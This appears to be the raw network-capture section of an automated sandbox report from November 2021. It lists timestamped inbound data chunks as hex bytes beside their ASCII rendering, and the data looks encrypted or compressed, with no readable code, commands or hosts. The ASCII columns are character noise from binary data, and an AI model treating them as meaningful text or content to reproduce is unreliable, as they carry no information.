                                            2021-11-24 14:40:42 UTC102INData Raw: 92 aa ee fe c1 32 32 48 27 7a 52 6f fb bc f9 06 06 f4 fb 24 ac 79 60 35 df 0c 67 a4 23 a2 62 22 c0 42 b7 c5 47 ef a9 ee 93 2e 62 57 c7 a3 4c 19 47 16 5a 27 81 40 35 18 5b fe 02 c5 83 62 17 25 d2 ac 02 df 05 ef b1 53 d3 be 52 d4 5b 89 43 90 c1 70 eb 5e 5e fc 46 5b c0 6a d2 79 34 c7 4e 06 25 32 30 fd c6 34 da ca 17 c9 8c ea f4 f3 45 b1 4e 0d d2 fb 8d 7c 76 de 40 78 50 fa 31 96 15 b3 94 7b 84 6f 18 47 35 13 6a d0 e4 a5 d1 8d e8 5c bb 2b 23 cb cf 5a 27 f4 1f 3b 03 b4 a5 0d 32 b2 5f ff 34 47 cd fd 8a a9 95 d1 05 73 fa c5 6f 5f 51 2a 32 cc cb cd 55 ae 47 41 15 5e aa 5b f7 47 67 33 7b d3 c4 09 25 c3 53 13 4b 45 36 07 54 14 7a 39 0e 5f cc b0 57 da 01 4d e4 60 97 da d9 93 94 1d 36 29 9f c5 97 68 de 1e 69 e1 3a 97 ab 11 ef 43 7d e5 0a 7a e1 15 f0 07 e5 e9 71 ab cf
                                            Data Ascii: 22H'zRo$y`5g#b"BG.bWLGZ'@5[b%SR[Cp^^F[jy4N%204EN|v@xP1{oG5j\+#Z';2_4Gso_Q*2UGA^[Gg3{%SKE6Tz9_WM`6)hi:C}zq
                                            2021-11-24 14:40:42 UTC103INData Raw: ee 86 d5 8e c8 7d 70 6a a3 b2 c8 38 01 38 e4 f5 4c c0 1b 94 fd 25 d5 47 9a 11 0d 6b 38 d8 c1 78 6a 21 89 c3 3d 49 59 7d 43 28 59 46 91 56 b5 6c 2a 8c 39 54 a7 a6 40 7a ba 7f fd 0d fe bb de ee 71 be 6b 75 75 8b 06 8e 81 1d 96 33 8a e8 4f 43 4c f8 81 0b cb 57 09 b3 88 ea b3 ab da 14 36 45 42 d5 98 85 74 54 ff bd e1 b5 a9 c9 b8 46 3a de a4 59 53 b5 ab 59 40 93 04 01 f5 32 cf 88 4b 3c 88 e6 e3 ad 2d d4 26 46 16 94 6a 8b e9 71 00 ee 01 af 75 e5 b0 f4 e2 e4 77 23 ad ee fd f8 32 b2 37 c7 bd b0 32 ca ca 37 01 3e e2 fa d1 d9 2d 6e 20 b8 09 6c 59 2f 38 e0 b0 a7 63 ee 3d 2f a3 1b 12 9f e9 e8 45 fc 51 fd e4 18 52 8c 5d 20 44 45 52 4c b0 d8 0c 01 da 6d 28 2b a3 17 54 a0 6a cc be 29 82 bd 11 f8 4c 58 7c 72 1e 2c 7a 2b b3 ff 57 32 7f 12 6e eb d5 cb af 62 c8 94 1e 34 d6
                                            Data Ascii: }pj88L%Gk8xj!=IY}C(YFVl*9T@zqkuu3OCLW6EBtTF:YSY@2K<-&Fjquw#2727>-n lY/8c=/EQR] DERLm(+Tj)LX|r,z+W2nb4
                                            2021-11-24 14:40:42 UTC104INData Raw: ce ec 23 c4 18 a3 53 f3 95 50 c4 3f b6 fd fc de 3e 29 57 d9 6a 78 76 fa 51 fd 30 02 fe 80 3b a5 66 72 dd f6 b9 74 a7 79 cf 63 4c 69 46 a9 8f c0 0a 45 17 8c 28 77 40 dd 4c 45 2a 4e ea 20 05 8a 51 37 2f 8c 6c 04 da b8 e8 1d 25 c9 b2 05 a7 52 ee 9d 53 c4 ca eb d2 5b 92 5a 9f 2c 79 c7 4c 4e f0 63 a5 d0 40 c1 74 c9 c2 0d ce 26 49 38 e3 e2 23 d1 b1 1f c0 92 10 dd 46 4e 89 7a e4 35 6b 3b 75 65 dc 5f 79 4b eb cf 86 3f af 85 96 8d 43 41 4d 51 12 95 d1 cc b6 4a a1 ff 86 02 2b 21 c9 cc 53 28 b7 8b 2a 17 ab a5 53 50 a2 76 ed 2b b4 2b f8 93 bb 16 d6 13 61 e5 c3 fb 51 4e cf 2c eb 4d df 00 b0 23 5b 88 4f ab 29 67 d9 76 3c 64 17 13 ce 58 df 58 0c 45 49 2b 14 4d 12 74 2a e6 a0 e1 be 56 b6 1c 44 e4 75 9d c6 86 70 94 31 30 6d 48 fc 2d 92 09 7b 41 e1 23 b1 b2 7e 3a 43 7d ef
                                            Data Ascii: #SP?>)WjxvQ0;frtycLiFE(w@LE*N Q7/l%RS[Z,yLNc@t&I8#FNz5k;ue_yK?CAMQJ+!S(*SPv++aQN,M#[O)gv<dXXEI+Mt*VDup10mH-{A#~:C}
                                            2021-11-24 14:40:42 UTC106INData Raw: e8 50 c1 02 a3 d3 1b 42 f2 88 e7 52 9d d6 8f 3e 7c 4d 6d be dc 3c 38 2d 30 cc 93 a4 7f fd 8a ee 36 ce 51 98 1d 12 6d ce c6 fa bd 69 76 9e c7 3e 45 58 fc be 00 65 46 9c 55 8b db 78 10 3a 3e 99 ec dc 77 bd 7c 72 0c e7 b6 4a f0 95 a9 db 7f 76 8e 92 87 8c 03 12 c4 96 d2 df 49 d4 51 f4 9d 69 56 03 ac 89 ea bf ab da 18 36 5a 42 d5 98 86 73 2c f9 a3 f5 67 87 dd 22 44 30 a9 ae 46 3c 18 b4 49 59 84 15 03 f9 2b 20 8d 7e cc 8d c9 62 18 4c 00 30 9c 01 95 09 0d f8 79 0a e5 1a b4 7e 0a b5 c7 e7 13 69 17 8d 84 99 fa 20 ba 33 d5 9d 31 ce cb ec 29 27 1e b4 05 2e c8 21 6b 33 ad 01 60 a3 30 ea e6 9b a7 52 dd 2d 3d ab 1f 15 bf 6c f2 bb f7 6b fe 8e b2 5a 93 43 e9 65 6a 57 4c ab f4 b3 fd db 4b 56 10 b1 13 50 ae 77 c0 ac d7 92 99 1a f6 c9 57 51 63 1f 50 77 2d 3d 4c 2d f5 3f d3
                                            Data Ascii: PBR>|Mm<8-06Qmiv>EXeFUx:>w|rJvIQiV6ZBs,g"D0F<IY+ ~bL0y~i 31)'.!k3`0R-=lkZCejWLKVPwWQcPw-=L-?
                                            2021-11-24 14:40:42 UTC107INData Raw: d1 e3 3d e1 f6 1e ae c0 b4 be 8e 31 ed 05 cd 67 c2 d4 f1 91 35 4a 39 aa e4 78 4f 2f 21 4f 31 43 c8 71 ec 48 d4 2e 07 fc 5e 59 af 68 6c 5e e6 94 65 a0 2b a5 7e 5a 03 98 00 d8 8e 7a 91 e8 93 3e 19 58 dc 5d 49 37 27 1a 20 29 84 49 27 57 cb 7d 02 cf 8d f9 6e 2b d9 ba 1e b2 d7 ff b0 59 c8 b3 50 d6 ec f7 1e 87 3f 7b e1 5f 3d e1 41 5b d5 65 db 19 5a c4 62 10 01 5e 34 22 e4 32 a2 bf 0f c8 88 81 5a 68 47 bb 52 71 f7 fc da 83 89 0a 53 40 74 fc 31 8d 3b 94 9d 85 8f 9d 50 53 64 1b 41 91 fc bb 5c a6 e8 5c ba 2a 26 da ca fa 39 a4 83 e2 07 a3 ba 4a ae a3 5a fd 23 db dd eb a3 b3 09 e8 00 69 e5 da f3 4e 45 27 26 ec 4c dc 57 a5 a6 54 a5 4d b7 4d e1 dc 60 c8 6c e1 a9 b7 2e c3 5e 14 bf 57 1c 05 6e 10 4e c1 f2 25 fa 93 55 a5 25 36 e6 4c 82 d9 a2 84 97 02 28 6e f6 c4 97 64 de
                                            Data Ascii: =1g5J9xO/!O1CqH.^Yhl^e+~Zz>X]I7' )I'W}n+YP?{_=A[eZb^4"2ZhGRqS@t1;PSdA\\*&9JZ#iNE'&LWTMM`l.^WnN%U%6L(nd
                                            2021-11-24 14:40:42 UTC108INData Raw: bf f2 d7 45 87 7a 28 7b a2 43 c4 f4 5b ce eb 8a 58 12 4a e9 a9 fd a5 85 de b4 db 78 5c 63 b7 44 c5 39 01 3d c9 81 a7 17 47 8b ee 3c c5 6f 65 11 12 7a d0 54 ea 43 68 5b 93 d6 29 65 e4 f0 68 22 71 56 9c 5f a9 7f 72 04 18 ac bc ed da 64 2f 63 61 04 e6 b4 46 f6 6f be df 8c 6a 9d 9c 25 8c 0f 1e 2e 83 d6 70 4a 5a ec c6 17 cb 57 09 80 92 d2 8f ac df 38 c4 51 bc d2 a2 1f 71 2f f1 bd f5 a5 bb c9 80 44 3a de a6 6f cd 18 ab 5f 5c 01 12 12 f1 33 ca 98 46 ea 2a ca ec a5 7e 6e 27 46 18 ba b0 17 eb 7b 30 9a ed 54 8a f3 a0 c3 1c 1e 76 09 ac 61 81 f6 33 b3 27 d0 81 03 93 ca c0 2b 37 0b 4b fa db d9 ec 73 16 94 3e 7d 5d 3b cb f7 96 98 59 95 33 24 7d 1f 02 9d 73 ea 45 b7 5b e7 8b b1 52 8c 57 3f 4d 56 56 bf a0 dc 1b 0c da 41 2b 23 b0 13 54 ab 6e d3 a5 cc b3 94 05 7e 36 56 7d
                                            Data Ascii: Ez({C[XJx\cD9=G<oezTCh[)eh"qV_rd/caFoj%.pJZW8Qq/D:o_\3F*~n'F{0Tva3'+7Ks>}];Y3$}sE[RW?MVVA+#Tn~6V}
                                            2021-11-24 14:40:42 UTC109INData Raw: d8 f7 69 e0 1c 0f ed 20 41 f2 5c 3f 38 3a f6 6b 93 95 c0 b5 97 91 3c fc 1e ba 27 cc d5 f0 fa 0d d7 3b a0 32 dc 2b 2b 21 48 0d 6c 7e 70 ec 42 b9 4e 11 f6 82 2a ad 79 49 23 f7 95 6e a4 29 b4 42 4d 69 42 bb cf 58 f7 ba e8 93 3f 66 48 dd 5d 09 35 5c 14 0b 28 80 40 5f 39 5b 7f 14 c5 ab fb 15 25 d8 ba 18 b0 ac ef 3a 58 cc a5 59 d2 5b 98 e6 86 3f 71 cb 5d 46 ef 40 5b d1 6c cf 76 ca c6 db 1b 27 49 a4 fc c6 30 8a b3 0e c8 9a ee dc 6a 47 b1 44 1b d1 a4 2d 7c 83 d6 5f 68 af fc 31 96 0d 21 b6 85 85 42 43 4c 3d a5 6b d0 ea a8 5a b7 ee 48 92 bc 24 da cc 5b b5 a3 83 2a 07 b0 b4 57 a0 b5 4b ee 81 ca d2 eb 9c a0 06 d4 14 7e 68 fd f3 4e 55 22 3d d6 47 ca 47 2e 49 45 9e 67 08 46 e1 d1 50 27 7d db 3b 8c 3a d2 56 1a db 7e 21 07 45 18 b5 30 f0 5e fb ba 41 a1 0f 46 cc 50 94 d9
                                            Data Ascii: i A\?8:k<';2++!Hl~pBN*yI#n)BMiBX?fH]5\(@_9[%:XY[?q]F@[lv'I0jGD-|_h1!BCL=kZH$[*WK~hNU"=GG.IEgFP'};:V~!E0^AFP
                                            2021-11-24 14:40:42 UTC111INData Raw: 90 94 34 6a 13 a1 ad f8 5f 9c bd 8d 1e d3 44 9a 5c a6 7c 0e 43 c5 e0 a1 da fc b3 d7 15 4f e3 89 a5 44 80 ca 96 3a 74 33 d9 a3 c9 c8 34 7f af dd 95 b9 34 ed e4 8d 36 d1 4d 98 13 39 24 d7 df 82 27 68 5a 8d b6 7f 4d 47 f1 7b 2c 5e 39 0f 5f a3 79 15 09 31 43 b2 c1 f0 62 a6 4c 69 01 e7 a1 2d 27 69 a8 fd 54 db 9d 9a 8d b1 19 1b 3e bf f7 d6 4a 5c 89 2e a0 cb 5d 6c b9 90 f9 bd a0 da 14 46 94 be d4 be 95 5e ca f2 bc e7 cf 3c e1 23 4e 55 ac b2 47 36 17 ba 5f 25 ea 15 12 fb 1f 41 52 5e d3 8f e6 eb be 50 b5 70 46 12 98 d9 10 e1 af 1f d1 3a 9c 75 f4 be f8 eb 32 7c 0a ba ea 8c de 0b b2 33 ce 4b 2b 36 e0 c1 3d 1f 51 49 fa c9 d3 5f e6 33 b0 09 7d 5d 31 c6 e1 9c b0 f4 00 33 3b b9 1f 04 b6 68 da 4d f6 fd e7 8b b1 bd 8c 57 2e 65 5d 53 4c a7 c8 33 3d d9 41 21 1b a1 13 54 bb
                                            Data Ascii: 4j_D\|COD:t3446M9$'hZMG{,^9_y1CbLi-'iT>J\.]lF^<#NUG6_%AR^PpF:u2|3K+6=QI_3}]13;hMW.e]SL3=A!T
                                            2021-11-24 14:40:42 UTC112INData Raw: 95 89 e4 bc 8b 04 20 ba bc 55 4d c9 e0 2e 09 1e 0f e1 75 40 0d a3 ca eb 2e e1 15 2c ac c0 bf 89 b1 2a fa 60 3b 1d cc d3 e7 bd 48 d6 3b a0 e2 f3 f6 3e 24 4e 21 04 4d 71 ec 48 c1 9d 10 f6 80 02 bf 7c 64 25 fa 9c 4d b7 2c b4 7c 22 70 43 b7 c5 74 fb b3 c0 87 3a 64 4e f5 79 4d 35 56 19 23 2f ef 8a 33 38 51 60 3a df bd 94 e1 24 d8 bc 32 a4 ad ef bb 71 9b a7 41 d4 73 b6 47 87 39 1e bf 5d 46 e5 68 6e d3 6c c7 65 cd d1 71 12 1f 18 3f fc c6 21 de b3 75 ff 8d ee d8 05 8c b3 44 11 10 8c fc 6b ac c3 89 e5 56 fc 31 86 00 a5 8b 94 82 41 2b 72 4f 1d 6f bf 2b b9 5c ac 32 44 62 2f fc c9 db 5f 32 8f bb 3b 0f b2 b0 44 a8 cc 90 e5 23 d1 d4 e9 9b 69 11 16 11 63 fd 0a 25 56 43 5e d9 c6 57 da 78 a6 59 55 83 67 f8 44 e1 dd 5e 18 6f cd ad cf 5d c3 59 06 e3 47 3a 10 93 01 6f 33 fa
                                            Data Ascii: UM.u@.,*`;H;>$N!MqH|d%M,|"pCt:dNyM5V#/38Q`:$2qAsG9]Fhnleq?!uDkV1A+rOo+\2Db/_2;D#ic%VC^WxYUgD^o]YG:o3
                                            2021-11-24 14:40:42 UTC113INData Raw: 0c a4 29 57 84 a4 3e da 14 6a 9d 87 42 33 05 ef a0 ad 99 3f f3 54 96 1e d5 2a 51 6e a5 76 b5 99 aa 31 4d da f6 cd 05 13 4a e5 59 db e0 c1 d9 97 36 6d 57 7a 93 37 c3 15 10 3f d4 8d 65 37 f2 9a ea 1e c2 46 8b 1f 0d 4f d5 d2 ed 52 63 45 ad 3c 3c 61 4b e1 6f 32 36 be 9d 5f a5 6c 51 03 3b 43 a9 e6 c3 6a 5c 65 4d 02 cc 94 5d fd 78 a3 f7 6d 65 82 ab 79 9c 27 01 39 9e e9 05 db 49 e2 f1 90 d8 5c 03 bd 9b e6 89 55 ca 3c 20 6d d2 2a 4b 6d 69 10 e2 b7 e1 a0 a4 fe 60 ba 3b f8 ba 4e 2b ca a6 46 0e 9f 1e 12 e0 39 c1 81 ac c3 a5 c1 9f af 54 da 21 55 17 8d 0b 04 e0 71 1b ff 0d ea 8b f5 98 c9 e9 75 8a 0e ba ea 81 99 cf b3 33 c2 fa fb 32 ca ca 36 c5 3e 9a f8 d1 d9 3a 0c cc bd 09 7b 42 73 d5 ea 9c a1 6a 8a 22 d0 a2 33 17 b4 7a fd 93 67 50 3d 9c 67 df a7 57 3f 4c 5a 49 5e b2
                                            Data Ascii: )W>jB3?T*Qnv1MJY6mWz7?e7FORcE<<aKo26_lQ;Cj\eM]xmey'9I\U< m*Kmi`;N+F9T!Uqu326>:{Bsj"3zgP=gW?LZI^
                                            2021-11-24 14:40:42 UTC114INData Raw: e5 e9 71 46 c5 b7 c7 92 e7 61 3f 95 01 6e 19 97 ab da 0c 5e b1 3f 29 2b 9d 6e 80 9e 96 89 bf d3 0a b4 2e bc fc 85 b6 95 f4 d7 63 6c ef 1b b7 7d f7 da f6 2b e4 1d e3 8f e8 31 29 37 92 d5 7e 7c f3 06 74 0f 92 68 53 65 d2 92 0d 04 a7 ef 97 05 d8 cf 3c 08 bf 1f ad 7d 63 95 7e 85 64 af 58 5e 27 b1 fc 52 56 c0 d5 7f 35 87 8a f3 88 1e 7d c1 34 d8 59 2d 93 68 f1 0f ed 86 dc ac 82 3b 79 e7 6a ca b7 ec f2 46 71 4e 9e 96 72 3b d2 2c d8 46 db 38 4c 8b b1 87 3f 6a 02 aa b2 82 c6 9d 84 87 0f d5 46 88 7b 73 ed cd b8 c4 e0 49 c5 e2 b1 f4 12 5b e8 90 f4 01 83 e6 9a 1d e7 43 46 b2 c2 c2 28 0a 23 cd 6b b2 13 f5 8c 81 ca d0 47 8d 04 17 13 14 db ed 49 77 4b 94 c9 3d 5c 4c e9 96 29 75 4b 8a 5c 2d c4 6d ca 23 4a b5 f7 cf 78 a2 75 6a 1c 19 a6 6e ee 18 a8 f5 7c 68 96 83 94 96 0b
                                            Data Ascii: qFa?n^?)+n.cl}+1)7~|thSe<}c~dX^'RV5}4Y-h;yjFqNr;,F8L?jF{sI[CF(#kGIwK=\L)uK\-m#Jxujn|h
                                            2021-11-24 14:40:42 UTC115INData Raw: b5 b3 03 ca d7 07 e1 86 58 f0 48 99 3e ee 7a 09 cb 23 52 3a c8 20 49 c9 0f 76 5f 5e da f6 fe 38 8b 34 e2 78 d8 80 76 6f 35 82 62 fc ab 61 ea a8 84 b2 50 be d6 ca 0c ad c6 45 19 40 b9 ec ea ff bd 57 ef 76 5d 50 69 04 6f b0 67 1f 8b 8a ff 9b 1d 08 f7 b6 d3 4f d1 67 dd 82 79 6b 8f 2e c6 71 03 1b c6 07 c6 5b 41 0a 7a ac ec 40 b1 98 1b 5e 98 33 44 8c 92 8d cb ad e2 02 b8 9a a4 03 24 b4 f0 3a 17 77 2b dc 8c 83 b7 a1 4d cc b4 6b 40 c2 8b f1 41 67 88 9a e7 94 8e 00 3f b9 6a 03 63 cf ee 2c 38 16 1c e2 1a 29 08 bd 3e e7 00 f5 78 e4 d5 86 b4 96 b9 33 3b 72 89 1d cc d1 ee 9c 49 d2 3b bb eb eb d4 d1 20 77 b0 6b 54 70 ee 39 bd 2b 11 f2 82 51 eb 78 64 27 ff 83 63 8c 1c b5 7a 47 6b 40 cb 88 59 f7 be fe bb 35 64 48 f6 20 0b 34 5c 10 28 2f 56 4d 09 81 5b 7f 02 c6 a2 21 06
                                            Data Ascii: XH>z#R: Iv_^84xvo5baPE@Wv]PiogOgyk.q[Az@^3D$:w+Mk@Ag?jc,8)>x3;rI; wkTp9+Qxd'czGk@Y5dH 4\(/VM[!
                                            2021-11-24 14:40:42 UTC116INData Raw: 6f 43 54 ab fc 10 79 fc 00 fd 16 f2 fb 64 4f 30 b6 fa 9f ec 74 de 8f 3e 68 1a 8f b1 15 63 4c 99 3e 6b 43 df 6f 91 91 9f 97 35 53 26 a2 28 c5 02 ff ff 92 f6 db 82 2c c6 2e b0 12 2f c2 e5 2c fb 14 fd 9b e2 de 23 04 99 3d 7d 2b bc 16 7e 13 c5 9d bf 90 3e 88 09 1c bf e2 86 1f ca f4 d3 f7 92 22 a3 65 73 55 e6 aa 80 55 8f b2 39 a3 e5 40 73 c2 d3 63 da 8d b9 f5 7e 6b 43 c8 0c 35 a9 cf 7f 7a fc 0d eb 99 da 59 9c 37 8d f7 42 c8 68 e7 20 5a 60 4a 45 07 b5 35 43 97 18 c1 f7 0f 4a 85 95 92 25 6f 82 2d 86 9f 38 9d a0 80 93 d4 45 81 6d b6 7b b3 44 d3 f1 4a 56 c3 a2 ff 13 e8 f2 88 c2 d7 29 ca 9c 3c 54 b1 64 a1 c3 ea e4 03 3c d7 09 ac 32 f7 86 ee 27 dc 58 80 eb 13 50 cf e1 93 43 68 5a 98 ce 2e 40 47 e1 65 33 a7 46 b0 0c a1 08 32 11 30 47 ac c5 c6 70 a2 62 76 89 e0 a7 42
                                            Data Ascii: oCTydO0t>hcL>kCo5S&(,./,#=}+~>"esUU9@sc~kC5zY7Bh Z`JE5CJ%o-8Em{DJV)<Td<2'XPChZ.@Ge3F20GpbvB
                                            2021-11-24 14:40:42 UTC118INData Raw: 4c 12 85 6c 22 61 f4 69 d8 ab 62 22 90 03 db c1 14 e4 ad 3b b0 02 b4 b7 10 7b 2f 72 5c 7e f2 c8 24 41 d3 29 23 70 6c c7 f2 21 2f 4c bc de 86 d9 ad 08 32 27 87 66 c7 ae 78 14 ba 98 b2 44 16 cd d9 09 5a d7 40 1e a8 ab c5 d1 84 af 52 ef 67 49 4f 8e fb 42 9e 49 0b ad 2b ee f1 d4 19 f2 a1 41 6d fd 70 df f9 3c 6a 8f 6a 9f 29 45 1a c6 03 ce 4d b2 1d 16 85 7d 4a af 81 a9 49 5f bb 77 72 93 a0 ce b8 f2 56 18 5b f3 3b 20 b9 da 14 0c 6d 36 04 85 e9 43 5f 4c ea b2 6a 5f f4 8b f3 43 67 94 a1 00 96 9f 0f 08 53 96 02 45 55 ef 11 f1 11 06 f6 1e 09 d4 a4 ea e6 3f d7 79 e6 11 c0 b5 96 41 30 ed 1e d9 0f c9 ed 5a 95 5a d7 3b bb eb ed 20 2e 0d 48 25 78 50 6a ff 47 f8 3b 14 ee 7e 2b 81 70 17 9a f7 95 6f af 30 a7 7f 4d 78 47 a0 31 59 db b9 f0 80 3a 64 59 d8 47 b3 34 70 11 37 24
                                            Data Ascii: Ll"aib";{/r\~$A)#pl!/L2'fxDZ@RgIOBI+Amp<jj)EM}JI_wrV[; m6C_Lj_CgSEU?yA0ZZ; .H%xPjG;~+po0MxG1Y:dYG4p7$
                                            2021-11-24 14:40:42 UTC119INData Raw: 5b ec b3 6b f6 82 04 6b 31 81 b7 11 de 43 7d e5 1e 77 f6 1b 9f e1 e2 f6 7d 58 df b0 c2 b1 17 5a c1 92 3a e8 1d 9e bc 0d 8e 53 a4 3e 7f 10 b3 6b 91 93 2b 8f 5f c6 32 b6 01 70 00 84 bc 82 f1 cb 24 74 ea 1b b7 05 a8 df f6 21 fa 16 ef 95 f7 36 0a 0e 8d 2b 79 f2 ee 08 6a 03 c6 6f 0f 9a 2d 87 3e 2a ae ef 8c 26 72 eb c2 03 aa c3 af 74 7b 4a 62 bb b6 a8 70 4b 31 3c f1 4d 73 d2 cd 5f 35 ac 83 e9 fa 20 51 c8 0d 8c b2 f2 78 63 e8 34 45 86 cd ad 89 33 44 e5 46 d9 a9 79 23 45 78 58 5b 26 b5 19 4a 8d 6a ff db 38 4d 36 81 b5 20 7e 07 89 0e 9f 38 96 bc bf dd d0 45 87 7b 28 7b a2 43 c4 f3 6d cb de b4 e8 9e 75 e3 8f d7 5d 93 e8 88 22 68 74 c6 a1 c9 c8 2d 29 ff de 95 b5 28 69 8c ee 36 d0 54 a8 04 31 6a d0 55 d2 43 68 5b 25 d3 1e 59 53 e4 40 8b 59 47 96 4b 8b b7 79 10 36 55
                                            Data Ascii: [kk1C}w}XZ:S>k+_2p$t!6+yjo->*&rt{JbpK1<Ms_5 Qxc4E3DFy#ExX[&Jj8M6 ~8E{({Cmu]"ht-)(i6T1jUCh[%YS@YGKy6U
                                            2021-11-24 14:40:42 UTC120INData Raw: 05 fe 49 1a 7c 72 1e 21 b1 da 3f 48 38 be 57 25 64 f4 c4 cb b9 76 d3 b8 3b ca d7 0d 3c 64 7a b0 13 b3 87 c9 7f 03 7a 76 35 3b c8 2e 63 fa 74 35 54 67 17 e3 24 2f 4b 34 e2 78 d8 80 18 31 36 aa 41 d3 ab 67 c2 9f b4 b7 5a 4f 24 cb 0c 5c d5 51 19 42 c5 18 d3 93 ba 38 09 74 4c 5f 63 df 56 92 63 09 86 82 c9 b6 fa 1b f2 a1 a1 64 fd 70 c4 ea 20 7b 93 3e ec 22 41 1a c0 15 43 4a 42 22 4e b9 f8 5e 87 28 1e 5e 83 1e 74 77 93 a7 d3 86 1d da af 46 38 34 30 9c d9 32 0e 62 38 51 9a 86 ac 5e 58 f4 aa 45 f5 fc ab fa 69 4e 91 89 e4 82 b7 ed 22 b0 9e 2a a6 cb e6 0c 36 00 1b cf 32 3c 0d a5 d6 6b 2b e7 7a e7 ba d4 a1 be 1e 30 ed 05 e7 36 c9 d5 f7 83 72 3f 39 aa e4 dc 37 2d 21 44 0f de 54 70 e6 6e e5 3b 0d e2 a8 ad ae 79 62 35 7a 92 65 a4 28 a0 6e 59 41 e1 b7 cf 52 df 26 e8 93
                                            Data Ascii: I|r!?H8W%dv;<dzzv5;.ct5Tg$/K4x16AgZO$\QB8tL_cVcdp {>"ACJB"N^(^twF8402b8Q^XEiN"*62<k+z06r?97-!DTpn;yb5ze(nYAR&
                                            2021-11-24 14:40:42 UTC122INData Raw: 5b e4 75 82 c6 82 70 94 31 26 57 43 ba db 6f f6 80 7a ee 18 9d b3 7e 40 50 76 f0 34 75 e5 13 e1 01 fc ef 85 54 e2 a3 c7 9f e9 5a e9 f2 2c 65 10 f1 4b 0d 9d 4b a6 32 76 22 85 79 91 84 9e 81 51 2c 27 8e 22 a0 f6 85 b6 95 e5 d9 13 8a fd 0c b1 03 32 c6 08 20 d7 0c c8 fa e9 20 22 37 81 38 68 50 ee 00 61 1a 2c 46 80 8d 3c 88 3e 3c a9 ef 80 26 e3 eb c2 03 bb 9b ae 74 71 50 7e 8c 7b b8 67 4d 37 a6 e9 5f 8d d2 f2 76 1c 41 94 ff 76 00 42 db 1b 2e b2 c5 73 55 02 1d ca 8a dc b7 95 74 af e4 46 d9 a1 d7 37 52 78 48 5f 1d 5a 39 70 91 98 53 db 38 46 87 94 8f 27 7d 13 b0 ba 80 31 62 a9 bb 15 c2 50 90 78 3f 6f a7 5c cf f3 58 da ed b5 e0 33 b4 e2 a3 dd 8c a0 c8 9c 30 6f 4c 7a 83 da d5 39 10 2b c2 80 4d 3e c8 ab ff 3f c0 4d 93 c3 7d 90 c4 d9 e7 2c ef 5b 87 c8 25 22 cf f1 68
                                            Data Ascii: [up1&WCoz~@Pv4uTZ,eKK2v"yQ,'"2 "78hPa,F<><&tqP~{gM7_vAvB.sUtF7RxH_Z9pS8F'}1bPx?o\X30oLz9+M>?M},[%"h
                                            2021-11-24 14:40:42 UTC123INData Raw: cf b1 13 52 a7 01 02 a6 d7 89 fe f9 fb 37 50 65 1d cb 29 6c 26 52 b6 39 9b 79 01 6a e5 c0 a6 e7 63 d9 94 12 c5 ff 1b e3 86 7e a3 18 c2 8d ec 7a 05 6f 4e 00 2b c0 4b 63 c9 74 33 4f 4e cf ed 0c 02 58 b9 cf 50 f6 83 0b 2c 1c 69 64 d6 a1 0e ce b9 b4 b1 41 2c c6 c1 24 77 c3 45 0e 7e 84 eb d2 95 94 bc ed 76 46 3a 56 f8 6e 9a 73 19 85 ff c6 9c 1d 1f f4 ba 3d 21 ea 71 df f3 e2 65 aa 02 f3 0a 45 10 d5 17 e6 75 42 22 45 73 ec 5b a5 9c c8 4d 83 27 56 63 84 9f b0 50 0a 27 be 59 3e fe 37 a1 e0 23 1f 72 a0 6b a2 6d 51 a0 b3 e6 94 6d 17 c8 ab f0 41 67 94 89 b1 94 9f 05 2b b0 94 02 11 c9 e6 06 35 1c 0f e7 00 38 0d a2 c0 e6 2c e7 e7 e6 ae c0 d8 97 bd 30 e7 0d cf 1c c3 d5 f1 95 40 d7 3b ab f5 c4 d7 2f 7b 4f 27 6b 51 71 ec 53 fa 20 13 e0 ef cb ac 79 6e 3c a8 a6 6d a6 3e db
                                            Data Ascii: R7Pe)l&R9yjc~zoN+Kct3ONXP,idA,$wE~vF:Vns=!qeEuB"Es[M'VcP'Y>7#rkmQmAg+58,0@;/{O'kQqS yn<m>
                                            2021-11-24 14:40:42 UTC124INData Raw: 45 12 64 78 f2 a0 f5 de 55 a1 0d 4e e7 19 ee d8 a2 8a 97 19 4f 3a 4c c4 93 44 f6 97 5b e5 30 6b b1 7e 46 4b 7c ef 04 64 0c 06 bd 16 e3 f4 79 2b fb b7 d6 9d 85 20 c0 94 29 67 ca d3 bc 0c 9f 65 a1 20 69 32 be 6e 90 95 83 e3 3c d3 26 a6 2a c7 fe 85 a0 6d f7 d5 0a b7 c3 19 b2 9c 92 a5 76 20 fb 01 f2 86 93 a0 23 28 8c 03 27 52 ff 1d 03 68 d3 47 a8 99 3b 8f 6d 68 ad ef 82 0c bc 6b c3 09 97 26 43 76 7b 49 72 87 8b aa 66 b3 27 ba f1 61 5e d1 da f1 93 f1 17 fe 76 1b 53 ca 77 ac a2 d2 68 5f a4 1e e6 8c b0 26 9c 1b 83 e2 50 dd c5 75 25 45 7c 5b 33 85 a5 38 58 b3 0b c2 db 32 49 80 6e 95 22 94 12 ad a5 b3 7f 9e ad 19 a9 ae c1 80 6c a1 7e a0 38 41 e1 4f de d4 fa fd 12 40 9e 0c d7 ff 86 cf 8a 34 07 df 64 a1 cd c0 42 85 3d dd 91 9b d2 e6 8b e4 34 d4 c9 3c 68 94 7d c6 dd
                                            Data Ascii: EdxUNO:LD[0k~FK|dy+ )ge i2n<&*mv #('RhG;mhk&Cv{Irf'a^vSwh_&Pu%E|[38X2In"l~8AO@4dB=4<h}
                                            2021-11-24 14:40:42 UTC125INData Raw: 4d 50 7c 1a df 45 1a ff df 5a b1 16 9d 19 72 aa 71 ff be ff ae 93 05 fc 1d 0c 03 eb 1b 2b 68 30 a7 6d 15 90 59 0e 7b c4 d1 d4 83 4f db 90 05 e0 8d 79 78 87 78 b4 0e 2b 8a c3 71 25 61 41 2d 24 c7 0c 66 c9 74 33 74 04 a0 78 25 2f 59 a7 53 5d f5 8a 2d 34 2b c9 79 db 83 4c e8 bb b2 9d 32 42 4e cb 0c 5e d9 4c 92 73 87 e5 f4 8c b5 48 b7 69 40 7d 5d f8 6e 9a 48 6b f8 09 ed 9e 19 06 f8 31 08 63 f1 56 c0 f3 23 0e 90 21 ec 27 47 1a c0 29 90 33 db 23 4f a9 f3 41 35 ae 33 55 af 29 57 6d fc b8 ed 83 f7 d8 a9 66 4b 56 bd b5 f1 32 11 68 b4 f9 b0 8a 8a 40 40 ff cc 72 4a d4 86 f2 41 61 be e7 9c 0d 9e 05 24 af 99 98 6a e4 e9 20 38 11 2f 69 1a 38 0d bc ca ce 01 e5 7a e0 84 ae cb 0f bc 30 e9 10 c1 86 e9 f8 fe b3 45 d9 1b 32 ee f4 de 30 2b 66 0a 69 54 76 